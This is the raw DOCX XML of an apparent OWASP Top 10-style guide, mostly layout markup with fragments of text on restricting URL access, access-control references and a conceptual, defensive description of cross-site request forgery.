          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>If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h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function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is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involved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in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workflow,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check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o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make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F1906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s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dit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p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ta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ow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FBACC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access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDDFC0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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NOTE: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Mos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web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pplication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on’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isplay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link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n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buttons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DB912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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>t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nauthorize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functions,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bu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i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“presentatio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laye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ccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1A5CE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control”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oesn’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tual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vid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tection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You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ust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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1372A781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impleme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heck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troll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usin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logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090C745" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D397FE1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="431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61EB9E19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</w:p>
    <w:p w14:paraId="271D0A3D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To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10-2007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9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9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ailu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9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o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9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stric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9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UR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49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ccess</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="201E81E1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</w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId498" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>ESAPI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId499" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Access</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId500" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId501" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>API</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D6965A9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="316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evelopmen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uthorization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F6DE4D3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0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ath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raversal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15F06A17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ce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1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Browsing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4322BC5D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dditiona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tro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ments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52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ASVS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26A1049E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId521" w:history="1">
        <w:proofErr w:type="gramStart"/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quirement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22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ea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23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or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24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cces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2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trol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26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V4)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId527" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A3AEA28" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1135C252" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="40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566C89B2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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·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28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29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30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285</w:t>
        </w:r>
      </w:hyperlink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31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32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Improper</w:t>
        </w:r>
      </w:hyperlink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33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Access</w:t>
        </w:r>
      </w:hyperlink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34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Control</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId535" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="94"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>(Authorization)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CEB5D90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0C71265F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="14"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6BD9C1CE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="646B6E54">
          <v:shape id="_x0000_s2394" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.9pt;width:570pt;height:231.05pt;z-index:251681280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019FB72C" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1023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64DCDEC0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="783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085A66F0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0F2BA9FB" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="50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1924BCC8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316AF9C8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="517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6FFD3F2D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616D9329" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="558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43B388CD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5993F271" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="505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1BC8CE51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7BDD0D22" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="625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742B9DF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="430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05E18445" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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379C0B5B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="50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786C760D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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73F9C250" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="47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COMM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4FA05EFD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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5668E75A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="69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11804090" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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00399820" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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C8DC5DD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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25EC78A5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2E8A2379" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2373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A4DBE38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one</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="438767B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oad</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3CA21372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ten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30D0D8F4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’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s,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="571FC8A1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u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c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m</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7960A6F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bm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quest</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0BF27A2C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site.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7045AA0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si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3B9973D0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th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TM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eed</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="08FCCA4F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</w:p>
                      <w:p w14:paraId="64E9E0B6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B5E7FCE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reates</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7359EBEE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g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TTP</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5BBD117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ques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icks</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7F53830D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o</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="41D789D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bmit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a</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="04D03B0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a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g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XS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437626CF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umerou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ther</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="26BB98CF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chnique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05E20D3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4C221D3F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enticated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53C8D60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ceeds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AC8743B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274" w:lineRule="exact"/>
                          <w:ind w:left="73"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId536" w:history="1">
                          <w:r w:rsidR="00C534F5">
                            <w:rPr>
                              <w:rStyle w:val="a3"/>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="3A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                            </w:rPr>
                            <w:t>CSRF</w:t>
                          </w:r>
                        </w:hyperlink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kes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dvantage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act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 w:rsidR="00C534F5"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</w:p>
                      <w:p w14:paraId="571FEE8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ow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redict</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7F0E6484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ail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ticula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tion.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="663313FC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="3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cau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w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redential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ike</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5092AA73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ss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oki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omatically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</w:p>
                      <w:p w14:paraId="25A1D9F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rea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liciou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ich</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4D32B610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enera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g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ques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</w:p>
                      <w:p w14:paraId="2D7F508A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distinguishabl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om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egitima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nes.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="084197FA" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="3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SR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law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air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s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a</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="576FFD2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enetr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s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d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alysi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E4EB460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ick</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2C6ABB77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o</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="15A68FFC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erform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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="31EE8286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ta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hanging</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="26122F90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per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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="22B77BD5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horiz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74167005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erform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.g.,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1BD4614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pda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ount</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3DA3FB1E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ail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king</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="56E57514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urchase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ogout</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3BC96F89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ogin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9C8AA7E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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624187CD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0703B01F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ffec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33885746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</w:p>
                      <w:p w14:paraId="1088F33F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agine</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="70E8710E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o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f</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="204616A1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nd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3BDEF1BC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k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tions.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="72EC8B91" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="31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act</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="77B32472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putation.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="047FAEC1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0874836E">
          <v:shape id="imagerId537" o:spid="_x0000_s2393" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251809280;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId537" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="78E2D08D">
          <v:shape id="imagerId538" o:spid="_x0000_s2392" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251808256;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId538" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="306796E7">
          <v:shape id="imagerId539" o:spid="_x0000_s2391" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251807232;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId539" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1114E221">
          <v:shape id="imagerId540" o:spid="_x0000_s2390" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251802112;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId540" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6933C708">
          <v:shape id="imagerId541" o:spid="_x0000_s2389" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251801088;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId541" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="02675CD8">
          <v:shape id="imagerId542" o:spid="_x0000_s2388" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251806208;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId542" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="52618343">
          <v:shape id="imagerId543" o:spid="_x0000_s2387" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251805184;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId543" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="01F59569">
          <v:shape id="imagerId544" o:spid="_x0000_s2386" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251804160;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId544" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="45718F1F">
          <v:shape id="imagerId545" o:spid="_x0000_s2385" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251803136;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId545" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="308C7806">
          <v:shapetype id="_x0000_m2384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7E54DE8">
          <v:shape id="_x0000_s2383" type="#_x0000_m2384" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25182464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2EA7AF2">
          <v:shapetype id="_x0000_m2382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87B8290">
          <v:shape id="_x0000_s2381" type="#_x0000_m2382" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.55pt;width:543pt;height:3pt;z-index:25168230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54C9054">
          <v:shapetype id="_x0000_m2380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5499AF7">
          <v:shape id="_x0000_s2379" type="#_x0000_m2380" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.8pt;width:543pt;height:3pt;z-index:25168332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53CAD543">
          <v:shapetype id="_x0000_m2378" coordsize="600,207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7645BE2">
          <v:shape id="_x0000_s2377" type="#_x0000_m2378" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.9pt;width:6pt;height:207.05pt;z-index:25168435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5025C032">
          <v:shapetype id="_x0000_m2376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34B28DC">
          <v:shape id="_x0000_s2375" type="#_x0000_m2376" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.4pt;width:543pt;height:3pt;z-index:25168537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56B72F1">
          <v:shapetype id="_x0000_m2374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6253410">
          <v:shape id="_x0000_s2373" type="#_x0000_m2374" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:274.5pt;width:543pt;height:3pt;z-index:25168640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5C4AF93E">
          <v:shapetype id="_x0000_m2372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348988A">
          <v:shape id="_x0000_s2371" type="#_x0000_m2372" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25182361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310B7E1">
          <v:shapetype id="polygon165" o:spid="_x0000_m2370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36B1319">
          <v:shape id="WS_polygon165" o:spid="_x0000_s2369" type="#polygon165" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-251822592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DC8702F">
          <v:shapetype id="polygon166" o:spid="_x0000_m2368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D84AD91">
          <v:shape id="WS_polygon166" o:spid="_x0000_s2367" type="#polygon166" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251821568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36035C22">
          <v:shapetype id="polygon198" o:spid="_x0000_m2366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9F250A1">
          <v:shape id="WS_polygon198" o:spid="_x0000_s2365" type="#polygon198" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25182054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00C06E2">
          <v:shapetype id="_x0000_m2364" coordsize="81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870D024">
          <v:shape id="_x0000_s2363" type="#_x0000_m2364" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:81.7pt;height:.6pt;z-index:-25181952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AEDA5DB">
          <v:shapetype id="_x0000_m2362" coordsize="151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A00A5EA">
          <v:shape id="_x0000_s2361" type="#_x0000_m2362" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:574.2pt;width:151.3pt;height:.55pt;z-index:-2518184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5E9D674">
          <v:shapetype id="polygon221" o:spid="_x0000_m2360" coordsize="1611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6D4EED1">
          <v:shape id="WS_polygon221" o:spid="_x0000_s2359" type="#polygon221" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:590.15pt;width:161.15pt;height:.6pt;z-index:-2518174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1DA9721">
          <v:shapetype id="_x0000_m2358" coordsize="1024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E4803D">
          <v:shape id="_x0000_s2357" type="#_x0000_m2358" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:606.2pt;width:102.45pt;height:.6pt;z-index:-2518164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E18874B">
          <v:shapetype id="_x0000_m2356" coordsize="1896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0B07A2">
          <v:shape id="_x0000_s2355" type="#_x0000_m2356" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:189.6pt;height:.55pt;z-index:-2518154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830C552">
          <v:shapetype id="_x0000_m2354" coordsize="1926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20E8AD1">
          <v:shape id="_x0000_s2353" type="#_x0000_m2354" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:638.15pt;width:192.6pt;height:.6pt;z-index:-2518144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2F05E54">
          <v:shapetype id="_x0000_m2352" coordsize="1579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A5F6D4C">
          <v:shape id="_x0000_s2351" type="#_x0000_m2352" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:654.2pt;width:157.9pt;height:.6pt;z-index:-2518133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29F0B99A">
          <v:shapetype id="_x0000_m2350" coordsize="952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0D1D3E">
          <v:shape id="_x0000_s2349" type="#_x0000_m2350" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:696.2pt;width:95.25pt;height:.6pt;z-index:-25181235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9279442">
          <v:shapetype id="_x0000_m2348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E6FA5C7">
          <v:shape id="_x0000_s2347" type="#_x0000_m2348" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25181132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1C37C299">
          <v:shapetype id="polygon255" o:spid="_x0000_m2346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2313270">
          <v:shape id="WS_polygon255" o:spid="_x0000_s2345" type="#polygon255" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251810304;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BECFDFD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="731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F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-Site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Request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Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD89A04" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="600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(CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299973C1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7EFA86F4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1848A8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA84558" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24794BF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C63F41B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0198A48D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57ED688C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D0ACF5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65882019" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32444AE8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FA685F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
